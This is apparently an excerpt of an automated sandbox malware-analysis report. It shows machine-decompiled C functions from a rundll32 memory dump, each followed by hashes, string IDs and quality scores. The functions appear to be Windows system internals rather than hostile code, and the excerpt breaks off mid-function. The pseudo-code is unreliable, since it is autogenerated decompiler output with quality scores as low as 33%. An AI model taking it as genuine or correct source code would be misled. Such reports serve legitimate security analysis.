                                                                                            					_v8 = 0;
                                                                                            					_t58 = E04619830();
                                                                                            					_t87 =  *[fs:0x30];
                                                                                            					_t108 = _t58;
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                            					if(_t108 < 0) {
                                                                                            						L11:
                                                                                            						_t51 = _t108;
                                                                                            					} else {
                                                                                            						_push(4);
                                                                                            						_push(8);
                                                                                            						_push( &_v36);
                                                                                            						_push( &_v44);
                                                                                            						_push(_v60);
                                                                                            						_t108 = E04619990();
                                                                                            						if(_t108 < 0) {
                                                                                            							L10:
                                                                                            							_push(_v60);
                                                                                            							E046195D0();
                                                                                            							goto L11;
                                                                                            						} else {
                                                                                            							_t18 = _t82 + 0x18; // 0x9e2bf01a
                                                                                            							_t109 = L045F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                            							if(_t109 == 0) {
                                                                                            								_t108 = 0xc0000017;
                                                                                            								goto L10;
                                                                                            							} else {
                                                                                            								_t21 = _t109 + 0x18; // 0x18
                                                                                            								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                            								 *_t109 = 1;
                                                                                            								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                            								 *(_t109 + 0xe) = _t82;
                                                                                            								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                            								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                            								_t29 =  &(_t103[2]); // 0x20029e2b
                                                                                            								E0461F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
                                                                                            								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                            								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                            								_t91 =  *_t103 & 0x0000ffff;
                                                                                            								_t34 =  &(_t103[2]); // 0x20029e2b
                                                                                            								_t100 = _t91 & 0xfffffffe;
                                                                                            								_t84 = 0x5c;
                                                                                            								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
                                                                                            									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                            										_push(_v60);
                                                                                            										E046195D0();
                                                                                            										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                            										_t51 = 0xc0000106;
                                                                                            									} else {
                                                                                            										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                            										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                            										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                            										goto L5;
                                                                                            									}
                                                                                            								} else {
                                                                                            									L5:
                                                                                            									 *_a4 = _t109;
                                                                                            									_t51 = 0;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				return _t51;
                                                                                            			}

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                            • Instruction ID: 424e11810586fffffd2443e569875c973a110634617f134c1c91ff1e60ae1d14
                                                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                            • Instruction Fuzzy Hash: C051AE712047119FD324DF29C840A6BBBF8FF88714F00892DFA95976A0E7B4E944CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 75%
                                                                                            			E04653540(intOrPtr _a4) {
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v88;
                                                                                            				intOrPtr _v92;
                                                                                            				char _v96;
                                                                                            				char _v352;
                                                                                            				char _v1072;
                                                                                            				intOrPtr _v1140;
                                                                                            				intOrPtr _v1148;
                                                                                            				char _v1152;
                                                                                            				char _v1156;
                                                                                            				char _v1160;
                                                                                            				char _v1164;
                                                                                            				char _v1168;
                                                                                            				char* _v1172;
                                                                                            				short _v1174;
                                                                                            				char _v1176;
                                                                                            				char _v1180;
                                                                                            				char _v1192;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				short _t41;
                                                                                            				short _t42;
                                                                                            				intOrPtr _t80;
                                                                                            				intOrPtr _t81;
                                                                                            				signed int _t82;
                                                                                            				void* _t83;
                                                                                            
                                                                                            				_v12 =  *0x46cd360 ^ _t82;
                                                                                            				_t41 = 0x14;
                                                                                            				_v1176 = _t41;
                                                                                            				_t42 = 0x16;
                                                                                            				_v1174 = _t42;
                                                                                            				_v1164 = 0x100;
                                                                                            				_v1172 = L"BinaryHash";
                                                                                            				_t81 = E04610BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                            				if(_t81 < 0) {
                                                                                            					L11:
                                                                                            					_t75 = _t81;
                                                                                            					E04653706(0, _t81, _t79, _t80);
                                                                                            					L12:
                                                                                            					if(_a4 != 0xc000047f) {
                                                                                            						E0461FA60( &_v1152, 0, 0x50);
                                                                                            						_v1152 = 0x60c201e;
                                                                                            						_v1148 = 1;
                                                                                            						_v1140 = E04653540;
                                                                                            						E0461FA60( &_v1072, 0, 0x2cc);
                                                                                            						_push( &_v1072);
                                                                                            						E0462DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                            						E04660C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                            						_push(_v1152);
                                                                                            						_push(0xffffffff);
                                                                                            						E046197C0();
                                                                                            					}
                                                                                            					return E0461B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                            				}
                                                                                            				_t79 =  &_v352;
                                                                                            				_t81 = E04653971(0, _a4,  &_v352,  &_v1156);
                                                                                            				if(_t81 < 0) {
                                                                                            					goto L11;
                                                                                            				}
                                                                                            				_t75 = _v1156;
                                                                                            				_t79 =  &_v1160;
                                                                                            				_t81 = E04653884(_v1156,  &_v1160,  &_v1168);
                                                                                            				if(_t81 >= 0) {
                                                                                            					_t80 = _v1160;
                                                                                            					E0461FA60( &_v96, 0, 0x50);
                                                                                            					_t83 = _t83 + 0xc;
                                                                                            					_push( &_v1180);
                                                                                            					_push(0x50);
                                                                                            					_push( &_v96);
                                                                                            					_push(2);
                                                                                            					_push( &_v1176);
                                                                                            					_push(_v1156);
                                                                                            					_t81 = E04619650();
                                                                                            					if(_t81 >= 0) {
                                                                                            						if(_v92 != 3 || _v88 == 0) {
                                                                                            							_t81 = 0xc000090b;
                                                                                            						}
                                                                                            						if(_t81 >= 0) {
                                                                                            							_t75 = _a4;
                                                                                            							_t79 =  &_v352;
                                                                                            							E04653787(_a4,  &_v352, _t80);
                                                                                            						}
                                                                                            					}
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                            				}
                                                                                            				_push(_v1156);
                                                                                            				E046195D0();
                                                                                            				if(_t81 >= 0) {
                                                                                            					goto L12;
                                                                                            				} else {
                                                                                            					goto L11;
                                                                                            				}
                                                                                            			}

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: BinaryHash
                                                                                            • API String ID: 2994545307-2202222882
                                                                                            • Opcode ID: 561f2d0ef9783113cc678884c9a1f99cc771122edaf4605988c9f0e856d42a3a
                                                                                            • Instruction ID: e2713a5be3721500760ecb01e15bc510c162c0c6b7e50fdc049507e42e7f2075
                                                                                            • Opcode Fuzzy Hash: 561f2d0ef9783113cc678884c9a1f99cc771122edaf4605988c9f0e856d42a3a
                                                                                            • Instruction Fuzzy Hash: 984118F1D0151D9AEB219A50CC80F9EB77CAB44758F0045A9EE09A7250EB306E888F99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 71%
                                                                                            			E046A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                            				signed int _v20;
                                                                                            				char _v24;
                                                                                            				signed int _v28;
                                                                                            				char _v32;
                                                                                            				signed int _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				void* __ebx;
                                                                                            				void* _t35;
                                                                                            				signed int _t42;
                                                                                            				char* _t48;
                                                                                            				signed int _t59;
                                                                                            				signed char _t61;
                                                                                            				signed int* _t79;
                                                                                            				void* _t88;
                                                                                            
                                                                                            				_v28 = __edx;
                                                                                            				_t79 = __ecx;
                                                                                            				if(E046A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                            					L13:
                                                                                            					_t35 = 0;
                                                                                            					L14:
                                                                                            					return _t35;
                                                                                            				}
                                                                                            				_t61 = __ecx[1];
                                                                                            				_t59 = __ecx[0xf];
                                                                                            				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                            				_v36 = _a8 << 0xc;
                                                                                            				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                            				asm("sbb esi, esi");
                                                                                            				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                            				if(_t42 != 0) {
                                                                                            					_push(0);
                                                                                            					_push(0x14);
                                                                                            					_push( &_v24);
                                                                                            					_push(3);
                                                                                            					_push(_t59);
                                                                                            					_push(0xffffffff);
                                                                                            					if(E04619730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                            						_push(_t61);
                                                                                            						E0469A80D(_t59, 1, _v20, 0);
                                                                                            						_t88 = 4;
                                                                                            					}
                                                                                            				}
                                                                                            				_t35 = E0469A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                            				if(_t35 < 0) {
                                                                                            					goto L14;
                                                                                            				}
                                                                                            				E046A1293(_t79, _v40, E046A07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t48 = 0x7ffe0380;
                                                                                            				} else {
                                                                                            					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                            				}
                                                                                            				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                            					E0469138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                            				}
                                                                                            				goto L13;
                                                                                            			}

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `
                                                                                            • API String ID: 0-2679148245
                                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                            • Instruction ID: 3a3ffc5f1f789588407cdbcfc7c43a8a50829149f359ab56ae56f6c5f02f2bcd
                                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                            • Instruction Fuzzy Hash: 6631C032704B456BE720DE24CD85F9A77D9AB84758F084229FA58EB280E670FD24CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 72%
                                                                                            			E04653884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                            				char _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr* _v16;
                                                                                            				char* _v20;
                                                                                            				short _v22;
                                                                                            				char _v24;
                                                                                            				intOrPtr _t38;
                                                                                            				short _t40;
                                                                                            				short _t41;
                                                                                            				void* _t44;
                                                                                            				intOrPtr _t47;
                                                                                            				void* _t48;
                                                                                            
                                                                                            				_v16 = __edx;
                                                                                            				_t40 = 0x14;
                                                                                            				_v24 = _t40;
                                                                                            				_t41 = 0x16;
                                                                                            				_v22 = _t41;
                                                                                            				_t38 = 0;
                                                                                            				_v12 = __ecx;
                                                                                            				_push( &_v8);
                                                                                            				_push(0);
                                                                                            				_push(0);
                                                                                            				_push(2);
                                                                                            				_t43 =  &_v24;
                                                                                            				_v20 = L"BinaryName";
                                                                                            				_push( &_v24);
                                                                                            				_push(__ecx);
                                                                                            				_t47 = 0;
                                                                                            				_t48 = E04619650();
                                                                                            				if(_t48 >= 0) {
                                                                                            					_t48 = 0xc000090b;
                                                                                            				}
                                                                                            				if(_t48 != 0xc0000023) {
                                                                                            					_t44 = 0;
                                                                                            					L13:
                                                                                            					if(_t48 < 0) {
                                                                                            						L16:
                                                                                            						if(_t47 != 0) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                            						}
                                                                                            						L18:
                                                                                            						return _t48;
                                                                                            					}
                                                                                            					 *_v16 = _t38;
                                                                                            					 *_a4 = _t47;
                                                                                            					goto L18;
                                                                                            				}
                                                                                            				_t47 = L045F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                            				if(_t47 != 0) {
                                                                                            					_push( &_v8);
                                                                                            					_push(_v8);
                                                                                            					_push(_t47);
                                                                                            					_push(2);
                                                                                            					_push( &_v24);
                                                                                            					_push(_v12);
                                                                                            					_t48 = E04619650();
                                                                                            					if(_t48 < 0) {
                                                                                            						_t44 = 0;
                                                                                            						goto L16;
                                                                                            					}
                                                                                            					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                            						_t48 = 0xc000090b;
                                                                                            					}
                                                                                            					_t44 = 0;
                                                                                            					if(_t48 < 0) {
                                                                                            						goto L16;
                                                                                            					} else {
                                                                                            						_t17 = _t47 + 0xc; // 0xc
                                                                                            						_t38 = _t17;
                                                                                            						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                            							_t48 = 0xc000090b;
                                                                                            						}
                                                                                            						goto L13;
                                                                                            					}
                                                                                            				}
                                                                                            				_t48 = _t48 + 0xfffffff4;
                                                                                            				goto L18;
                                                                                            			}















                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: BinaryName
                                                                                            • API String ID: 2994545307-215506332
                                                                                            • Opcode ID: 0a9bae393fc24b797824578a5511a87389a8bde22cdaf782ce58c80878523e2f
                                                                                            • Instruction ID: b406026d7f63d3b2ddefbd681496507851ec48539c791ce964038fcf806e7d7f
                                                                                            • Opcode Fuzzy Hash: 0a9bae393fc24b797824578a5511a87389a8bde22cdaf782ce58c80878523e2f
                                                                                            • Instruction Fuzzy Hash: 8A31E2B290050AAFEB25DA58C945D6BB774FB80B60F014129ED54A7760F730BE44C7E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 33%
                                                                                            			E0460D294(void* __ecx, char __edx, void* __eflags) {
                                                                                            				signed int _v8;
                                                                                            				char _v52;
                                                                                            				signed int _v56;
                                                                                            				signed int _v60;
                                                                                            				intOrPtr _v64;
                                                                                            				char* _v68;
                                                                                            				intOrPtr _v72;
                                                                                            				char _v76;
                                                                                            				signed int _v84;
                                                                                            				intOrPtr _v88;
                                                                                            				char _v92;
                                                                                            				intOrPtr _v96;
                                                                                            				intOrPtr _v100;
                                                                                            				char _v104;
                                                                                            				char _v105;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed int _t35;
                                                                                            				char _t38;
                                                                                            				signed int _t40;
                                                                                            				signed int _t44;
                                                                                            				signed int _t52;
                                                                                            				void* _t53;
                                                                                            				void* _t55;
                                                                                            				void* _t61;
                                                                                            				intOrPtr _t62;
                                                                                            				void* _t64;
                                                                                            				signed int _t65;
                                                                                            				signed int _t66;
                                                                                            
                                                                                            				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                            				_v8 =  *0x46cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                            				_v105 = __edx;
                                                                                            				_push( &_v92);
                                                                                            				_t52 = 0;
                                                                                            				_push(0);
                                                                                            				_push(0);
                                                                                            				_push( &_v104);
                                                                                            				_push(0);
                                                                                            				_t59 = __ecx;
                                                                                            				_t55 = 2;
                                                                                            				if(E045F4120(_t55, __ecx) < 0) {
                                                                                            					_t35 = 0;
                                                                                            					L8:
                                                                                            					_pop(_t61);
                                                                                            					_pop(_t64);
                                                                                            					_pop(_t53);
                                                                                            					return E0461B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                            				}
                                                                                            				_v96 = _v100;
                                                                                            				_t38 = _v92;
                                                                                            				if(_t38 != 0) {
                                                                                            					_v104 = _t38;
                                                                                            					_v100 = _v88;
                                                                                            					_t40 = _v84;
                                                                                            				} else {
                                                                                            					_t40 = 0;
                                                                                            				}
                                                                                            				_v72 = _t40;
                                                                                            				_v68 =  &_v104;
                                                                                            				_push( &_v52);
                                                                                            				_v76 = 0x18;
                                                                                            				_push( &_v76);
                                                                                            				_v64 = 0x40;
                                                                                            				_v60 = _t52;
                                                                                            				_v56 = _t52;
                                                                                            				_t44 = E046198D0();
                                                                                            				_t62 = _v88;
                                                                                            				_t65 = _t44;
                                                                                            				if(_t62 != 0) {
                                                                                            					asm("lock xadd [edi], eax");
                                                                                            					if((_t44 | 0xffffffff) != 0) {
                                                                                            						goto L4;
                                                                                            					}
                                                                                            					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                            					E046195D0();
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                            					goto L4;
                                                                                            				} else {
                                                                                            					L4:
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                            					if(_t65 >= 0) {
                                                                                            						_t52 = 1;
                                                                                            					} else {
                                                                                            						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                            							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                            						}
                                                                                            					}
                                                                                            					_t35 = _t52;
                                                                                            					goto L8;
                                                                                            				}
                                                                                            			}

































                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @
                                                                                            • API String ID: 0-2766056989
                                                                                            • Opcode ID: 9ca41e2648f5a0e66e2c908619fcbd65fea363d84042039abf0a3f450bc3e50d
                                                                                            • Instruction ID: 37f8a1b74a98d4de2b6cc495d97e992cc6bccc37cddca1f5829e0522df36d852
                                                                                            • Opcode Fuzzy Hash: 9ca41e2648f5a0e66e2c908619fcbd65fea363d84042039abf0a3f450bc3e50d
                                                                                            • Instruction Fuzzy Hash: C03192B16083059FD314DF68C88096BBBE8FB96754F004A2EF59483250F639FD05DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 72%
                                                                                            			E045E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                            				intOrPtr _v8;
                                                                                            				char _v16;
                                                                                            				intOrPtr* _t26;
                                                                                            				intOrPtr _t29;
                                                                                            				void* _t30;
                                                                                            				signed int _t31;
                                                                                            
                                                                                            				_t27 = __ecx;
                                                                                            				_t29 = __edx;
                                                                                            				_t31 = 0;
                                                                                            				_v8 = __edx;
                                                                                            				if(__edx == 0) {
                                                                                            					L18:
                                                                                            					_t30 = 0xc000000d;
                                                                                            					goto L12;
                                                                                            				} else {
                                                                                            					_t26 = _a4;
                                                                                            					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                            						goto L18;
                                                                                            					} else {
                                                                                            						E0461BB40(__ecx,  &_v16, __ecx);
                                                                                            						_push(_t26);
                                                                                            						_push(0);
                                                                                            						_push(0);
                                                                                            						_push(_t29);
                                                                                            						_push( &_v16);
                                                                                            						_t30 = E0461A9B0();
                                                                                            						if(_t30 >= 0) {
                                                                                            							_t19 =  *_t26;
                                                                                            							if( *_t26 != 0) {
                                                                                            								goto L7;
                                                                                            							} else {
                                                                                            								 *_a8 =  *_a8 & 0;
                                                                                            							}
                                                                                            						} else {
                                                                                            							if(_t30 != 0xc0000023) {
                                                                                            								L9:
                                                                                            								_push(_t26);
                                                                                            								_push( *_t26);
                                                                                            								_push(_t31);
                                                                                            								_push(_v8);
                                                                                            								_push( &_v16);
                                                                                            								_t30 = E0461A9B0();
                                                                                            								if(_t30 < 0) {
                                                                                            									L12:
                                                                                            									if(_t31 != 0) {
                                                                                            										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                            									}
                                                                                            								} else {
                                                                                            									 *_a8 = _t31;
                                                                                            								}
                                                                                            							} else {
                                                                                            								_t19 =  *_t26;
                                                                                            								if( *_t26 == 0) {
                                                                                            									_t31 = 0;
                                                                                            								} else {
                                                                                            									L7:
                                                                                            									_t31 = L045F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                            								}
                                                                                            								if(_t31 == 0) {
                                                                                            									_t30 = 0xc0000017;
                                                                                            								} else {
                                                                                            									goto L9;
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				return _t30;
                                                                                            			}










                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: WindowsExcludedProcs
                                                                                            • API String ID: 0-3583428290
                                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                            • Instruction ID: 2c5d0f0d06cee882f38831fcc5c632bf50a28117a1cfd7525a68d120136aba43
                                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                            • Instruction Fuzzy Hash: 762128B6601928ABDB259E97C940F6B77ADBF41715F054465F908CB200E630FD00E7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                            				intOrPtr _t13;
                                                                                            				intOrPtr _t14;
                                                                                            				signed int _t16;
                                                                                            				signed char _t17;
                                                                                            				intOrPtr _t19;
                                                                                            				intOrPtr _t21;
                                                                                            				intOrPtr _t23;
                                                                                            				intOrPtr* _t25;
                                                                                            
                                                                                            				_t25 = _a8;
                                                                                            				_t17 = __ecx;
                                                                                            				if(_t25 == 0) {
                                                                                            					_t19 = 0xc00000f2;
                                                                                            					L8:
                                                                                            					return _t19;
                                                                                            				}
                                                                                            				if((__ecx & 0xfffffffe) != 0) {
                                                                                            					_t19 = 0xc00000ef;
                                                                                            					goto L8;
                                                                                            				}
                                                                                            				_t19 = 0;
                                                                                            				 *_t25 = 0;
                                                                                            				_t21 = 0;
                                                                                            				_t23 = "Actx ";
                                                                                            				if(__edx != 0) {
                                                                                            					if(__edx == 0xfffffffc) {
                                                                                            						L21:
                                                                                            						_t21 = 0x200;
                                                                                            						L5:
                                                                                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                            						 *_t25 = _t13;
                                                                                            						L6:
                                                                                            						if(_t13 == 0) {
                                                                                            							if((_t17 & 0x00000001) != 0) {
                                                                                            								 *_t25 = _t23;
                                                                                            							}
                                                                                            						}
                                                                                            						L7:
                                                                                            						goto L8;
                                                                                            					}
                                                                                            					if(__edx == 0xfffffffd) {
                                                                                            						 *_t25 = _t23;
                                                                                            						_t13 = _t23;
                                                                                            						goto L6;
                                                                                            					}
                                                                                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                            					 *_t25 = _t13;
                                                                                            					L14:
                                                                                            					if(_t21 == 0) {
                                                                                            						goto L6;
                                                                                            					}
                                                                                            					goto L5;
                                                                                            				}
                                                                                            				_t14 = _a4;
                                                                                            				if(_t14 != 0) {
                                                                                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                            					if(_t16 <= 1) {
                                                                                            						_t21 = 0x1f8;
                                                                                            						_t13 = 0;
                                                                                            						goto L14;
                                                                                            					}
                                                                                            					if(_t16 == 2) {
                                                                                            						goto L21;
                                                                                            					}
                                                                                            					if(_t16 != 4) {
                                                                                            						_t19 = 0xc00000f0;
                                                                                            						goto L7;
                                                                                            					}
                                                                                            					_t13 = 0;
                                                                                            					goto L6;
                                                                                            				} else {
                                                                                            					_t21 = 0x1f8;
                                                                                            					goto L5;
                                                                                            				}
                                                                                            			}












                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Actx
                                                                                            • API String ID: 0-89312691
                                                                                            • Opcode ID: bbdee6affc32c9e90b0726167452ec714db17973ca3aa4d0ed9e3f7c398055c1
                                                                                            • Instruction ID: e28b5edf158f9af3b3c23d04c4b77d5f33fb9083aa6c1852f708e58ca3f97142
                                                                                            • Opcode Fuzzy Hash: bbdee6affc32c9e90b0726167452ec714db17973ca3aa4d0ed9e3f7c398055c1
                                                                                            • Instruction Fuzzy Hash: 1D119637306E428BEB244D1D9C90736F395FB95724F24492BD661DBB91EA70F841B382
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 71%
                                                                                            			E04688DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                            				intOrPtr _t35;
                                                                                            				void* _t41;
                                                                                            
                                                                                            				_t40 = __esi;
                                                                                            				_t39 = __edi;
                                                                                            				_t38 = __edx;
                                                                                            				_t35 = __ecx;
                                                                                            				_t34 = __ebx;
                                                                                            				_push(0x74);
                                                                                            				_push(0x46b0d50);
                                                                                            				E0462D0E8(__ebx, __edi, __esi);
                                                                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                            					E04665720(0x65, 0, "Critical error detected %lx\n", _t35);
